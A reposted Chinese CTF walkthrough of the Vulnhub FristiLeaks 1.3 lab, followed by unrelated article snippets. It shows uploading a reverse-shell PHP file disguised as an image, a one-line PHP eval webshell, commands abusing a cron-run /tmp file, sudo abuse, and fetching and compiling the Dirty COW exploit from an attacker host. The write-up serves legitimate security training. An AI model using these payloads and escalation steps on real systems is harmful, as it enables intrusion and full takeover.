【甄选靶场】Vulnhub百个项目渗透——项目十六:FristiLeaks_1.3(文件上传,py脚本改写,sudo提权,脏牛提权,源码获取)

article/2025/5/3 3:55:03

Vulnhub百个项目渗透

Vulnhub百个项目渗透——项目十六:FristiLeaks_1.3(文件上传,py脚本改写,sudo提权,脏牛提权,源码获取)

靶场地址


🔥系列专栏:Vulnhub百个项目渗透
🎉欢迎关注🔎点赞👍收藏⭐️留言📝
📆首发时间:🌴2022年9月18日🌴
🍭作者水平很有限,如果发现错误,还望告知,感谢!

巅峰之路

  • Vulnhub百个项目渗透
  • 前言
  • 一、梳理流程
    • 配置靶场
    • 1.服务发现
    • 2.web突破
      • 1.页面信息收集
      • 2.脆弱服务突破
      • 3.webshell小技巧
    • 2.内网突破
      • 1.内网信息再次收集
      • 2.内网脆弱服务突破
    • 2.sudo提权
    • 3.脏牛提权
    • 4.源码获取


前言

本文章仅用作实验学习,实验环境均为自行搭建的公开vuinhub靶场,仅使用kali虚拟机作为操作学习工具。本文仅用作学习记录,不做任何导向。请勿在现实环境中模仿,操作。


一、梳理流程

  1. 端口发现(看看使用了哪些端口,开启了什么服务,寻找突破点)
  2. 信息收集(利用遍历,关键词搜索等方式对敏感文件,插件尝试访问,寻求突破并获取shell)
  3. 二次收集(基于已得到的服务或者主机再次信息收集)
  4. 内网提权(尝试利用内核,各种版本漏洞等方式来提升权限)
  5. 毁尸灭迹(清除日志等文件,但是靶场就没必要了,拿旗就走)

配置靶场

在这里插入图片描述

右键设置->网络适配器->高级,更改MAC地址为
08:00:27:A5:A6:76

在这里插入图片描述

然后再开机靶场,就可以看到ip了

1.服务发现

在这里插入图片描述

2.web突破

1.页面信息收集

恕我直言,我一开始啥也没搜集到,爆破目录只爆破出来一个robots.txt
看了一下,各种组合都访问不到,甚至做了本地host
直到我开始尝试页面那四个单词

在这里插入图片描述在这里插入图片描述

192.168.247.145/fristi
这是个页面,我绝绝子

在这里插入图片描述

看到登陆页面第一个想到

  1. 弱口令
  2. sql注入
  3. 页面信息枚举搜集泄露的密码

sql注入有点麻烦,我就试了弱口令,失败,那就查看一下页面信息,没有的话用cewl爬一下,实在不行再考虑sql

在这里插入图片描述

于是我打开了源码,先看到了一个用户

在这里插入图片描述

如此显眼的base64,不需要上面的提示我都知道,hhhhh天才

在这里插入图片描述

果断解码,一个是个图片,一个是乱码

在这里插入图片描述

是个图片,里面的应该是密码,但是我还是查看一下16进制信息,防止坑

strings from_the-x.png

在这里插入图片描述

2.脆弱服务突破

啥也没有,那密码就是那个一大串,然后登陆

在这里插入图片描述

文件上传的口子,啥也不想的,直接先用kali自带的php脚本搞上去,顺便加上 GIF89a 这个头(在php脚本里加)

locate php-reverse-shell.php   
----这个属于常识,我们要对kali自带的有好多种脚本熟悉,最起码记得个大概
cp xxxxxxxxxxxxxxxxxxxxxxxx .
gedit php-reverse-shell.php
再把后缀改成.jpg文件里面要改的喔,IP和端口改成自己的本地还要开一个对应的端口接shell喔

上传成功,提示说在/uploads这个目录下

在这里插入图片描述

但是访问失败

在这里插入图片描述

并且看下面那个图,没有转圈,说明根本就没执行,这就说明它因为解析jpg失败(因为他实际上是php),所以直接不解析。真是个懒逼。。。

  • WINDOWS呢是这样,如果有多个后缀,那他就从最后一个往回执行,直到成功解析,多后缀名绕过也是一种常见但是目前也基本没有活路的绕过方式啦

在这里插入图片描述

再执行
发现绕圈圈
本地的端口也接到了shell
那么就开始内网环节

3.webshell小技巧

https://github.com/melbinkm/PHPImageShell

直接上传该php的shell,可以运行command命令框!
然后执行python那些的反弹啊啥的都行了就

2.内网突破

1.内网信息再次收集

先上传提权3脚本,以前的博客有写,这里就不写了
我的终端不知道为什么是这样,可能是做了安全限制,一般解决办法就是本地写好然后复制粘贴

python -c 'import pty;pty.spawn ("/bin/bash")'  --生成稳定终端

在这里插入图片描述

然后就是枯燥的翻找,不过靶场一般还好,最多到上一级父目录就能发现下一步突破口了

在/home/eezeepz目录下发现:notes.txt文件

在这里插入图片描述

发现,翻译

2.内网脆弱服务突破

在这里插入图片描述

就是说意思是说如果正在运行脚本,则该脚本将在/tmp目录中以admin身份执行任何命令(如果位于runthis的文件中),所以只需要执行一个命令,使用/tmp/runthis文件技巧就可以访问/admin/文件(还有每个文件一分钟后才生效…)

先去user/bin看一下

在这里插入图片描述

没啥用,就一堆函数
那接下来就是要执行命令,利用他给的提示,给我们的apache服务权限,因为我们是通过apache搞进来的,所以我们就是apache用户,或者你要问我增麽知道是apache的,这个不重要或者告诉你说:第三张图nmap扫出来的?不重要

echo "/home/admin/chmod 777 /home/admin" > /tmp/runthis   
---对apache赋权admin用户权限
ls -l /home/admin
cat /home/admin/cryptedpass.txt  发现信息:mVGZ3O3omkJLmy2pcuTq
cat /home/admin/whoisyourgodnow.txt  发现信息:=RFn0AKnlMHMPIzpyuTI0ITG以及下面一个py文件
import base64,codecs,sys
def encodeString(str):base64string= base64.b64encode(str)return codecs.encode(base64string[::-1], 'rot13')
cryptoResult=encodeString(sys.argv[1])
print cryptoResult

在这里插入图片描述

经过实际操作,他给的源码有问题,报错,那我们稍微修改一下

在这里插入图片描述

他给的:
import base64,codecs,sys
def encodeString(str):base64string= base64.b64encode(str)return codecs.encode(base64string[::-1], 'rot13')
cryptoResult=encodeString(sys.argv[1])
print cryptoResult我们写的,这些注释记得删掉,不然报错
python
import base64,codecs,sys      ------一样的       
// ---使用python导入base64,codecs,sys模块module!
rot13Str = "mVGZ3O3omkJLmy2pcuTq"  ----rot135str是我的自定义变量,输入密文
base64Str = codecs.decode(rot13Str[::-1], 'rot13') 
// --用codecs编码转换[::-1],decode编码转换rot13
clearTextStr = base64.b64decode(base64Str)   
// ---base64Str进行decode进行base64解码
print (clearTextStr)         //---打印出clearTextStr总的来说就是依据现有规则做二创

在这里插入图片描述

成功,另一个同理,修改一下py文件就行

获得的两个密码:
thisisalsopw123
LetThereBeFristi!

到这里的话,我们还剩什么用户没有登陆了呢?剩一个admin,剩一个fristigod
这是刚才提权脚本扫出来的。。。

先登录admin用户,看一下能不能sudo提权

sudo -l  
提示:Sorry, user admin may not run sudo on 16-FristiLeaks_1.

在这里插入图片描述

2.sudo提权

不能用那就换一个

sudo -l 
提示:(fristi : ALL) /var/fristigod/.secret_admin_stuff/doCom
直接将用户sudo用做fristi来访问/var/fristigod/.secret_admin_stuff/doCom:那我们就按照他说的做呗sudo /var/fristigod/.secret_admin_stuff/doCom su -
Sorry, user fristigod is not allowed to execute '/var/fristigod/.secret_admin_stuff/doCom su -' as root on 16-FristiLeaks_1.3.
翻译:不允许用户fristigod以root权限运行!到这似乎已经是死路一条了,但是
在查看/var/fristigod目录下的cat .bash_history发现了历史命令:
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom su -
获得root权限!或者将/bin/bash附加到doCom也行:
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom /bin/bash
获得root权限!

在这里插入图片描述
在这里插入图片描述

3.脏牛提权

内网信息收集的时候脚本跑出来的

wget http://10.211.55.19:8081/40839.c
gcc -pthread 40839.c -o dayu -lcrypt
chmod +x rong
./rong rong
执行完提示将firefart密码修改为rong为root权限!
su firefart
rong
然后就获得root权限了!

4.源码获取

GIF98
<?php eval($_REQUEST[1]);?>
cp /var/www/html/fristi/uploadstar -zcvf web.tar.gz /var/www/html/*cp web.tar.gz /var/www/html/fristi/uploads

这时候就可以download源码下来了!丢到seay里面去审计!


http://chatgpt.dhexx.cn/article/MICPnBdl.shtml

相关文章

vue全家桶——vuex

本文主要介绍vuex【状态管理模式】&#xff0c;在介绍vuex前&#xff0c;需要重点说下一些概念 vue最大的特点之一。数据驱动视图&#xff0c;可以吧数据理解成状态&#xff0c;视图-view可以理解成用户看到的页面&#xff0c;页面是动态变化的&#xff0c;而这个变化必须是有…

博客园滑块验证码破解

极验最初的滑块验证码是两张图&#xff0c;首先出现的是原图&#xff0c;点一下出现凹槽&#xff0c;然后拖动滑块进去&#xff0c;注意拖拽速度就可以破解成功。 原理&#xff1a; 分别遍历扫描原图和有凹槽的图片像素&#xff0c;进行对比&#xff0c;像素不一致的位置就是凹…

尚硅谷Vue2.0+Vue3.0全套教程视频笔记 + 代码 [P001-050]

视频链接&#xff1a;尚硅谷Vue2.0Vue3.0全套教程丨vuejs从入门到精通_哔哩哔哩_bilibili P1-50&#xff1a;当前页面。 P51-100&#xff1a;尚硅谷Vue2.0Vue3.0全套教程视频笔记 代码 [P051-100]_小白桶子的博客-CSDN博客 P101-135&#xff1a;尚硅谷Vue2.0Vue3.0全套教程视…

【Vue】Mock.js的使用教程,入门级(附代码和案例)

Mock.js的使用&#xff08;附代码和案例&#xff09; 1、什么是mockjs 生成随机数据&#xff0c;拦截Ajax请求 了解一项技术&#xff0c;官网当然要知道 Mock.js 官网 2、程序 前端&#xff1a;访问后端接口&#xff0c;展示数据后端&#xff1a;后端负责业务逻辑&#xff0c…

YDOOK:vue3.0: vue-cli4.5: 引入 Element PLUS 的正确方法 Vue-cli4.5 引入 element+ plus

YDOOK&#xff1a;vue3.0: vue-cli4.5: 引入 Element PLUS 的正确方法 Vue-cli4.5 引入 element plus 1. 官网的指导安装使用方式尚未更新&#xff0c;显示的是&#xff1a; 2. 如果使用的是 npm 安装, 输入的代码为&#xff1a; npm install element-plus --save大陆建议使用…

使用Xposed对软件进行破解

入门 去AS里面新建一个NoActivity项目&#xff0c;最好把minimum版本调小 <!-- 加载Xposed模块--><meta-dataandroid:name"xposedmodule"android:value"true" /> <!-- 模块描述--><meta-dataandroid:name"xpose…

破解root密码精简版

破解root密码精简版&#xff1a; 1、重启虚拟机 2、在linux16末尾加上 rd.break,ctrlx执行 3、mount -o remount,rw /sysroot 把根以读写的方式挂载 挂在系统的根sysroot 4、chroot /sysroot 5、passwd root 6、输入新密码&#xff1a; 7、确认密码 8、touch /.autorelabel 标…

【word论文排版教程4】样式的应用

【word论文排版教程4】样式的应用 在使用样式处选择相应样式&#xff0c;同样可以使用之前设置的快捷键 标题比较长&#xff0c;使用软回车进行换行

【word论文排版教程2】论文章节安排及分节

【word论文排版教程2】论文章节安排及分节 论文章节可分为如下8个章节&#xff1a; 封面 中文摘要 英文摘要 目录 正文 参考文献 附录 致谢 输入封面&#xff0c;添加分解符 添加分解符效果 同样方法为其它章节添加分解符。

【word论文排版教程1】页面设置

【word论文排版教程1】页面设置 页面设置要求如下&#xff1a; 页面格式&#xff1a;纸张A4&#xff0c;上2.6cm&#xff0c;下2.6cm&#xff0c;左2.5cm&#xff0c;右2cm&#xff0c;装订线位置左侧&#xff0c;装订线0cm&#xff0c;无文档网格 页面布局->页面设置

毕业必备!推荐收藏的学位论文排版教程(word完整版)

本文将介绍学位论文的页面布局&#xff0c;标题格式&#xff0c;文档生成列表&#xff0c;插入公式&#xff0c;页眉页脚&#xff0c;生成目录、表格和图片的交叉引用、插入参考文献、英语翻译校对等内容和技巧&#xff0c;学习内容偏多&#xff0c;同学们可以先收藏下来&#…

毕业论文word文档排版教程(动图的方式演示,针对wps)

很久之前写好的文章&#xff0c;不知不觉毕业了那么久了 目录 1 常用快捷键 2 显示全部格式标记 3 因有手动换行符无法实现首行缩进 4 利用表格制作矩阵 5 因有英文(代码)和中文而导致空隙过大 6 设置页码和目录 xx 参考文献自动编号并更新文章中的序号 xxx 页…

Latex基本使用:论文排版

文章目录 前言一、参考文献引用二、插入符号1.插入希腊字母2.插入符号 三、插入公式三、插入图片总结 前言 记录使用Latex排版论文的方法。 一、参考文献引用 引用参考文献使用的是bib文件&#xff0c;首先在tex文件所在目录下新建txt文件&#xff0c;修改后缀为bib。 在谷歌…

texlive2020 + vscode 论文排版教程

这是我准备公开的第二篇技术博客&#xff0c;之前也写过一些简单的&#xff08;拿不出手的&#xff09;博文&#xff0c;但一直没信心公开&#xff0c;不过最后觉得也没啥&#xff0c;大家可以交流嘛&#xff0c;万一你写的有错&#xff0c;有好心人看见了指出的话那也是极好的…

毕业论文排版教程(word)桂林电子科技大学

摘要&#xff1a;满心欢喜地给导数发去初稿&#xff0c;换来了一句“格式乱起八糟”&#xff0c;你是否还在为论文排版而苦不堪言&#xff0c;认真看完这份教程&#xff0c;让你轻松搞定毕业论文排版。 毕业论文排版教程&#xff08;word&#xff09;桂林电子科技大学 样式图片…

【word论文排版教程3】制作样式和列表

【word论文排版教程3】制作样式和列表 一级标题&#xff1a;黑体小二&#xff0c;居中&#xff0c;行距“固定值:20磅”&#xff0c;段前、段后均1行。 二级标题&#xff1a;黑体小三&#xff0c;无缩进&#xff0c;行距“固定值:20磅”&#xff0c;段前、段后均0.5行。 三级及…

Word论文排版教程

设置样式 要求&#xff1a; 以下以修改“大标题”为例&#xff0c;其他以此类推 1、大标题 再点击右下角的“段落” 2、标题4… 我们发现word默认只显示了三级标题的样式&#xff0c;如果我们还要更多的样式&#xff1a; &#xff08;选择“所有样式”即可&#xff09; …

论文排版教程

论文排版教程 Tips 一、 常用键 Delete 向后删除 CtrlEnter插入一个分页符 Alt 插入公式 二、 单位可以直接输入 三、定制功能区提升效率 论文正题 一、信息栏制作方法 二、目录制作方法 三、页眉页脚设置 插入分节符 分节符的作用&#xff1a;使得前后两部分在语义上…

Word排版小技巧 | 快速论文排版

文章目录 1.设置中英文字体不同2.设置文档样式3.设置页边距4.设置页眉/页脚/页码添加页眉和页码页眉下边有横线设置从某一页开始显示页码 5.设置自动保存时间&#xff0c;防止死机丢文件6.批量删除空格、空行7. 竖向删除内容8. 图片批量修改大小9. 图片批量居中10.一键拆分表格…

吐血推荐收藏的学位论文排版教程(完整版)

目录 01.保存的高级选项设置 02.纸张设置为A4纸大小 03.设置页边距和装订线距离 04.度量衡的设置 05.创建“论文正文”样式 06.修改论文正文样式 07.设置并修改标题样式 08.给中英文摘要、附录、等大标题套用样式 09.两个Word文档之间进行并排查看 12.一键生成多级列…